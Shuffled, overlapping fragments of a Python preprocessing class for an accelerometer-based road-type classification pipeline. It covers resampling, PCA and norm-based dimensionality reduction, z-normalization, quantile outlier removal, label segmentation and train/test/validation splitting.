config['pre_proc_test_sz']", "Apply all preprocessing steps necessary for inference. 
:param data: pandas.DataFrame :param params: List", "if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html #", "data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'pca': #", ":return: pandas.DataFrame \"\"\" try: if data is None or replacement_mode is None: raise", "data: :param columns: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0):", "encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return", "\"\"\" try: data = None for ind in range(len(data_segments)): if data is None:", "or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) <", "min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data set. 
:param data: :param", "current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data,", "= data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels)", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode,", "not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/", "not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise", "range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif", "euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' 
) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs',", "outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments,", "https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "* valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len)", "segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean')", "'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels =", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels)", "= self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] =", "df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1. 
Ensure", "run @0.95 for classical approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments,", "for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction')", "column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data,", "= lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0) #", "= [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train", "replacement_mode, columns, quantile = None, threshold = None): \"\"\" Removes outlieres either based", "data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality(", "self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] =", "data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs,", "train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns =", "= reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data =", "is None or replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "data, replacement_mode, columns, quantile = 
None, threshold = None): \"\"\" Removes outlieres either", "if data is None or replacement_mode is None or unwanted_labels is None: raise", "= pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined = None for", "as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is", "pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels", "#Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train)", "value data_segments = [] for target_label in args: selected_data = data[data[label_column] == target_label]", "params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train =", "mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment,", "reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\"", "= (data - data.mean()) / data.std() elif mean is not None and std", "motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std", "columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-2]", "in 
segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are too", "std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for", "https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced =", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function):", "if mode == 'labels': # 1. Select all data with desired label value", "args: :return: \"\"\" try: if data is None or target_columns is None or", "= data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise", "ind in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else: data =", "data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else: mean = data.mean() std", "is not None: if columns is not None: data[columns] = (data[columns] - mean)", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise", "inference. 
:param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if", "int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len)", "'mean') if segments_combined is None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment],", "is None or mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return", "self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train,", "= args[1] exact_length = args[2] segments_aggregated = [] split = lambda df, chunk_size", "std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99", "remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None): \"\"\" Removes outlieres", "necessary for training. 
:param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame", "return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid", "or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode ==", "mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95", "better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns =", "8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better", "not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode", "None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "data is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "labels: :param data: :return: \"\"\" try: if data is None or labels is", "mode is None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError,", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides 
def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\"", "== segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))", ":param current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self,", "std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99", "mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "/ data[columns].std() else: mean = data.mean() std = data.std() data = (data -", "data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns,", "columns=None): \"\"\" Apply min-max-normalization to a data set. :param data: :param columns: :return:", "isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None:", "have an unwanted label. :param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try:", "= None): \"\"\" Apply a dimensionality reduction technique to a data set. 
:param", "print('Fetch params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz", "data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile',", "fixed interval. :param data: :param mode: :param label_column: :param args: :return: \"\"\" try:", "around 0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0:", ":param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params')", "is None or replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "!= len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test =", "= self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test", "data: :param freq: :param mode: :return: \"\"\" # Source: # 
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html", "outlier removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train)", "= data[data[label_column] == target_label] # 2. Split by non-subsequent indices # Source for", "data.set_index(old_index) return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index =", "= self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data,", "for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation,", "pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback", "[] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for", "self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current", "None, std = None): \"\"\" Apply z-normalization to a data set. 
:param data:", "for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels)", "1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind],", "= data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index", ":param label_column: :param args: :return: \"\"\" try: if data is None or mode", "\"\"\" try: if data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", ":return: \"\"\" try: if data is None or mode is None or reduced_column_name", "car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in", "overrides import traceback import os import pandas from sklearn.decomposition import PCA import numpy", "to center around 0.0 substract 0.5 else: data = (data - data.min()) /", "for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) #", "str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source:", "segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index()", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None):", "for road_segment in road_segments: 
data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels)", "return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data(", "reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data,", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column", "\"\"\" Removes outlieres either based on quantile or a threshold value. 
:param data:", "= data.mean() std = data.std() data = (data - data.mean()) / data.std() elif", "selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label", "column = 'time', unit = 'ms') data = self.label_data(data, labels) data = self.remove_nans(data,", "in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers]", "or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq,", "self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25", "value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is None", "= data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len", "training. 
:param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels,", "os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels vector and data matrix.", "= None for ind in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns]", "valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]]", "list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99", "\"\"\" Desegements as time series. :param data_segments: :param selected_columns: :param axis: :return: \"\"\"", "data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by", "selected_data = data[data[label_column] == target_label] # 2. 
Split by non-subsequent indices # Source", "ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean", "ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply a dimensionality", "via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid", "= [] for target_label in args: selected_data = data[data[label_column] == target_label] # 2.", "ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean", "@overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode:", "= [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels )", "mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 #", "to a global coordinate system. 
:param data: :param target_columns: :param mode: :param args:", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 #", "data is None or mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "#Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better", "# current run @0.95 for classical approach via TS Fresh )[:-2] #Test data_test", "technique to a data set. :param data: :param mode: :param reduced_column_name: :param columns:", "def label_data(self, labels, data): \"\"\" Combines labels vector and data matrix. :param labels:", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. 
Remove segments that", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "for classical approach via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test,", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile':", "or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column,", "data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments", "[] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for", "data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if data is", "label_data(self, labels, data): \"\"\" Combines labels vector and data matrix. 
:param labels: :param", "road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments", ") for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind]", "data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] =", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None):", "win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test,", "# Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1)", "for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label',", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for", "set. 
:param data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if", "8000 1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] =", "in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for", "labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise", "works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train", "len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "= data.std() data = (data - data.mean()) / data.std() elif mean is not", "range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]],", ":return: \"\"\" try: if data is None or target_columns is None or mode", "after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments", "#data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train,", "= [] for car_segment in car_train_segments: road_segments = 
